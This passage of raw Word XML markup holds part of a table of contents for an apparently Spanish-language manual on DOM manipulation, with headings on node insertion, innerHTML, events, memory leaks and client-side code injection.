            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319987 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="67C668C0" w14:textId="02ECC7E4"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988" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.6.1 — Crear e insertar</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319988 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41AD89FB" w14:textId="03E66704"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89" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>Insertar muchos: el fragmento de documento</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319989 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3993422B" w14:textId="68E0726B"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990" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t xml:space="preserve">4.6.2 — </w:t>
        </w:r>
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>textContent</w:t>
        </w:r>
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t xml:space="preserve">, </w:t>
        </w:r>
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>innerText</w:t>
        </w:r>
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t xml:space="preserve"> e </w:t>
        </w:r>
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>innerHTML</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319990 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="615E393F" w14:textId="5C58A877"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991" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.6.3 — Atributos y propiedades</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319991 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76C7069E" w14:textId="50D5DF15"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992" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t xml:space="preserve">Los </w:t>
        </w:r>
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:noProof/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>data-</w:t>
        </w:r>
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>, terreno de atributos</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319992 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4C55C858" w14:textId="0DA82F28"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993" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.6.4 — Clases</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319993 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11F3B602" w14:textId="2F1FEB94"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994" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.7 — Inyección de código en el cliente y la regla RN-F02</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319994 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D9A1CA1" w14:textId="0B0C6CCF"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995" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.7.1 — El problema</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319995 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C492548" w14:textId="650614CF"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996" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.7.2 — La demostración</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319996 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D27F800" w14:textId="3B176079"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997" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.7.3 — Por qué filtrar la palabra «script» no alcanza</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319997 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5161DE5B" w14:textId="5559393F"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998" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.7.4 — La regla</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319998 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="329C3867" w14:textId="2C713C73"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999" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.8 — Eventos</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239319999 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E2C9E1D" w14:textId="29EC2F8B"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000" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.8.1 — Las tres fases</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320000 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00BA7816" w14:textId="4ED262FC"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001" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.8.2 — Registro y opciones</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320001 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0C9D844A" w14:textId="544CD784"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002" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.8.3 — Delegación</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320002 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="11E8C961" w14:textId="208B99F9"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003" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.8.4 — Cancelar y detener</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320003 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A823996" w14:textId="319C699D"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004" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.9 — Ciclo de vida, fugas de memoria y la regla RN-F01</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320004 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60E7F92F" w14:textId="1E6C5CEB"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005" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.9.1 — Qué mantiene vivo a un nodo</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320005 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E4F5F6C" w14:textId="1EEFD8E7"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006" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.9.2 — Una fuga real</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320006 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="060C7E37" w14:textId="09C9CEF3"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007" w:history="1">
        <w:r w:rsidRPr="00D9787E">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
            <w:lang w:val="es-AR"/>
          </w:rPr>
          <w:t>4.9.3 — La regla</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc239320007 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
